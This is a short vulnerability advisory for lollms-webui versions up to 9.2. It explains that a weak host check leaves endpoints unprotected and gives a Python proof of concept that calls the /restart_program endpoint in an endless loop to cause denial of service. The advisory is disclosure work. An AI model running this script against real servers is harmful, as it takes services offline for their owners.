Exposed endpoints in lollms-webui leads to denial of service
(,9.2], Fixed in 9.3
Multiple sensitive endpoints are not well-protected from access by outside actors. The current protection checks whether the host parameter isn't 0.0.0.0
.
if lollmsElfServer.config.host=="0.0.0.0"
However, the application may be run exposed to a specific interface, in which case this check will be insufficient.
// PoC.py
import requests
from time import sleep
IP_ADDRESS = "aaa.bbb.ccc.ddd" #Change this to the address of the chosen interface
PORT = 9600
while True:
try:
response = requests.get(f"http://{IP_ADDRESS}:{str(PORT)}/restart_program")
print(response.json())
except Exception:
pass
sleep(1)
No mitigations are supplied for this issue